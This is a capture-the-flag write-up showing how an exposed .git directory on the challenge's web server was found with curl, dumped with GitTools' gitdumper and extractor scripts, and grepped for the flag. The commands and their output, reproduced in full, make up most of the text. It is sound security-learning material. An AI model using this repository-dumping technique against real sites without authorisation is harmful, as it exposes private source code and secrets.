A Very Professional Website

793

Instructions

Web dev skills go brrr

By Caleb (@eden.caleb.a on discord)

Solution

Poking around the website I didn’t find much other than documents so I started to manually search around for some common directories/files. When I tried to access .git/ I received a 403 http error instead of a 404 indicating that the directory does exist.

$ curl guppy.utctf.live:8549/.git/
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.21.6</center>
</body>
</html>

I checked the HEAD file to confirm that we have read access to the files within the directory:

$ curl guppy.utctf.live:8549/.git/HEAD
ref: refs/heads/main

From here, I used GitTools to dump and extract the flag.

  1. Dump the repository:
$ ./gitdumper.sh http://guppy.utctf.live:8549/.git/ ../repo
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[-] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[-] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/e2/a975aa4dc20fd279591267b64617f73ede199e
[+] Downloaded: objects/bb/a639202cd2e6228b65a4d20bf0e9c38dd4e479
[+] Downloaded: objects/9d/525e298e3b9fc70c9e8110b593c65c8b897361
[+] Downloaded: objects/d6/cebe17a2ef4c5eec1f7ee1ed1b77d9a66be79c
[+] Downloaded: objects/73/f3e2181302f0aef5da05ae4f4948aba58ebded
[+] Downloaded: objects/45/0b6bb9e3944e09e345348840a0311e7b70e2e0
[+] Downloaded: objects/9c/8220f43c7c86d4b7d284c42c9cd515f15e79c8
[+] Downloaded: objects/1d/2961fb02140ea819212ac081b0291c323fd056
  1. Restore contents of commits
$ ./extractor.sh ../repo ../repo-extracted
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: bba639202cd2e6228b65a4d20bf0e9c38dd4e479
[+] Found file: ../repo-extracted/0-bba639202cd2e6228b65a4d20bf0e9c38dd4e479/documentation.html
[+] Found file: ../repo-extracted/0-bba639202cd2e6228b65a4d20bf0e9c38dd4e479/index.html
[+] Found file: ../repo-extracted/0-bba639202cd2e6228b65a4d20bf0e9c38dd4e479/links.html
[+] Found file: ../repo-extracted/0-bba639202cd2e6228b65a4d20bf0e9c38dd4e479/secrets.html
[+] Found commit: e2a975aa4dc20fd279591267b64617f73ede199e
[+] Found file: ../repo-extracted/1-e2a975aa4dc20fd279591267b64617f73ede199e/documentation.html
[+] Found file: ../repo-extracted/1-e2a975aa4dc20fd279591267b64617f73ede199e/index.html
[+] Found file: ../repo-extracted/1-e2a975aa4dc20fd279591267b64617f73ede199e/links.html
  1. Search for the flag
$ grep -Ri utflag ../repo-extracted/
../repo-extracted/0-bba639202cd2e6228b65a4d20bf0e9c38dd4e479/secrets.html:        <li>If you squint your eyes, every country's flag contains very tiny text which reads: utflag{gitR3fl0g}</li>